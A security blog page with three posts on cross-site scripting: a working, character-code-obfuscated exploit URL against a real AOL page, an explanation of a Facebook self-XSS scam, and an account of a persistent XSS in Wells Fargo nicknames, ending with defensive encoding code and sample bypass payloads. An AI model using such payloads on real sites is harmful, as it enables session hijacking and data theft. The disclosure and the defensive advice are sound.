Showing posts with label xss. Show all posts

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Here's my video about exploiting cross-site scripting attacks in the wild. I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 minutes.

See the attack and video live on the page, or watch below (I'll keep this link live as long as it works).

The JavaScript we inject is a <br> followed by a <script> tag whose body is eval(String.fromCharCode(...)). The real payload, a document.write of a YouTube embed, travels as a list of character codes, so the parameter never has to carry the quotes and angle brackets that a filter would most likely look for. URL-encoded, the whole thing becomes:

http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack, meant for educational purposes only. If you want to see it, my copy is here: AOL XSS attack landing page. If you are having issues with XSS attacks on your domain or would like help securing your application, contact me; I'd love to help.

P.S. The tool I used to do the string encoding is here.

Tuesday, June 22, 2010

Social Engineering + Encoded JavaScript = Facebook XSS: The Attack Explained

Update

OK, good news guys: they have finally removed the page! But I reported them like 3 times and there was no "this page is hacking" button. I think it's stupid that this grew to over a few hundred thousand duped before Facebook found and removed it. I even tweeted to them about this article after I made some JavaScript to pull the page's likes and update the count dynamically.

@facebook http://j.mp/95PvuT there's a page serving #XSS! read my analysis of #exploit code here #facebook #socialengineering

Facebook needs a better way to deal with these kinds of attacks, or at least a way to report them more easily.

Original Post

A friend I never talk to just sent me to this page on Facebook: "The Most CRAZIEST & EPIC Facebook Break Up Ever! Absolute MUST SEE!" I usually never trust these things, but they had some custom FBML, so I wanted to see what was up. After you like the page you get access to the exploit code I've copied below. It gives instructions to paste the code into the address bar. Now, I totally thought it was suspect, but I've seen things like this do cool easter eggs before, so I tried it. Then I get a notification: "Your invitations have been sent." Doh! I've been duped, but I don't feel so bad, because they have

150,490 likes

so I'm just one of many. Now let's see what's going on...

You must view original post to see code...


Now let me just run some Carter magic on this and see what it's doing. First it creates a link on the page, then simulates a mouse event on that link. There are then three functions set on timers to hide the dialog, select all contacts, submit the form, and finally replace the container with an iframe serving spam. Note that nothing here needs a hole in Facebook itself: because the victim pastes the code into their own address bar, it runs in the victim's logged-in session with every permission the victim has. That is self-XSS, and the social engineering is what delivers it.

I gotta admit, pretty well done: get the users to run the exploit for you, and because Facebook makes it so hard to report hackers, I bet I have infected many of my friends and have no way of stopping or recovering the notifications. I looked everywhere and I can't find any way to see a log of what I've sent or how I can recover those messages.

Lame Facebook Lame!

Wednesday, January 20, 2010

The persistent XSS hole I found in WellsFargo.com

I like to dabble in security; XSS holes are fast and easy. The first one I ever found was on the online editor Aviary when I was a beta tester. It was a small one: they had scrubbed HTML in every field (.NET had done it for them), but they had forgotten to sanitize the filename input from their Flash app, and I got my tags in! Woohoo, XSS holes. I happened to be checking my Wells Fargo account, and you can nickname your accounts, and I thought to myself: self, I wonder if I could put some HTML in my account nickname and have it render. Let's try it :)


and

We got tags

But I was dealing with a character limit, a common problem with cross-site scripting attacks. No matter; I decided to try for the long shot. I used Chrome to change the max length of the text field to something I could really put some code in, fully not expecting it to work, and then boom: I got an entire script tag with a JavaScript alert. And it's persistent!

How I changed the max length of the text field:

The next morning I tried to find the correct people to call and got to the phishing department, but not the real web guys. Then I was really impressed: I got a call from their online fraud department. They had detected that HTML was being posted from my account, and I quickly offered up that it was me who was inserting the HTML and told them about the hole. (This was months ago and I'm sure they fixed the hole by now, so I don't think I'm hurting anything by posting this; I'm sure I will know if they think otherwise.) Anyway, the cool part is that even though they weren't aware of the hole, their system detected the XSS anyway. Way cool, and props to you security guys at Wells Fargo! I was asked not to try to attack the account portal anymore (so I wouldn't set off alarms again) and was thanked for letting them know about the hole. It was a small one, but some JavaScript left by an attacker could send the balance to a remote server and then steal cookies (I'm sure stealing cookies wouldn't work, but for the sake of this argument) and, if there was a large enough balance, alert the attackers. Also, because it is a persistent attack and the HTML doesn't render on the screen, the script could sit there for a long time without the user ever knowing.

So how do you protect the applications you write from XSS attacks? The answer is simple, and it's the same idea as protecting against SQL injection: never let user input reach the page as code. Encode every user-supplied value for the context it is written into (HTML-entity-encode it in text, attribute-encode it inside attributes) at the point where it is written to the screen. Stripping HTML with regular expressions is a much weaker substitute: tag-stripping regexes are easy to get past with nested or malformed tags, and with a persistent hole anything you miss sits in the database. And for god's sake, please enforce character limits on the server side, and don't expect the HTML maxlength="20" to do your job for you; as shown above, it takes seconds to change in the browser.
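To make that concrete, here is an added example (my own code, written for this page; it is not Wells Fargo's, whose implementation I have never seen) of a nickname field handled both ways. The 20-character limit is an assumption chosen to match the maxlength="20" above. It shows a 20-character payload that fits the limit, a nested-tag trick that slips past a regex that strips <script> tags, and the output-encoding step that makes both inert.

```javascript
// Added example, not code from the original post or from Wells Fargo.
// The limit below is assumed to match the form's maxlength="20".
const NICKNAME_MAX = 20;

// The "strip tags with a regex" approach: one pass that removes <script> tags.
// Kept here only to show why it is not enough.
function stripScriptTags(s) {
  return s.replace(/<\/?script[^>]*>/gi, "");
}

// Output encoding: the five characters that let text break out of an HTML
// text node or a quoted attribute. Applied when writing, not when reading.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side validation. The browser's maxlength is advisory: anyone can
// edit it in devtools (as the post shows) or skip the form and POST directly.
function saveNickname(store, accountId, nickname) {
  if (typeof nickname !== "string") {
    return { ok: false, error: "nickname must be a string" };
  }
  const chars = Array.from(nickname); // count code points, not UTF-16 units
  if (chars.length === 0 || chars.length > NICKNAME_MAX) {
    return { ok: false, error: `nickname must be 1-${NICKNAME_MAX} characters` };
  }
  store.set(accountId, nickname); // stored as-is; encoding happens on output
  return { ok: true };
}

// Render the nickname into the account list. Whatever was stored becomes text.
function renderNickname(store, accountId) {
  return `<span class="nick">${escapeHtml(store.get(accountId) || "")}</span>`;
}

// Constructed inputs (my own, for this example):
//  alert  - the post's script-tag payload, too long for the limit
//  short  - a 20-character payload that fits the limit exactly
//  nested - a bypass for the regex stripper: removing <script> and </script>
//           once leaves behind a brand-new <script> tag
//  long   - an over-long nickname of the kind the devtools trick lets through
const SAMPLES = {
  alert: "<script>alert(1)</script>",
  short: "<b onclick=alert(1)>",
  nested: "<scr<script>ipt>alert(1)</scr</script>ipt>",
  long: "x".repeat(NICKNAME_MAX + 30),
};

// Stand-alone run: node this_file.js
const demoStore = new Map();
console.log("stripper on nested input:", stripScriptTags(SAMPLES.nested));
console.log("save long:", saveNickname(demoStore, "acct-1", SAMPLES.long));
console.log("save short:", saveNickname(demoStore, "acct-1", SAMPLES.short));
console.log("rendered:", renderNickname(demoStore, "acct-1"));
```

The length check stops the devtools trick, but on its own it would still let the 20-character payload through; the regex stripper turns the nested sample into a working script tag; only the encoding at render time neutralises everything, which is why it belongs on the output path and not on the input path.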

Below is my JavaScript alert from the cross-site scripting hole in wellsfargo.com. Those guys do a great job, and I've been a customer for like 7 years. Wells Fargo is awesome, and I hope they don't make me take this down, because it is a great example of this attack, and they did catch it, so there really wasn't that bad of a security problem...

I'd love to hear your questions / comments / concerns about this article. Bother me on Twitter, I'm @cartercole, and I love to answer any of your questions.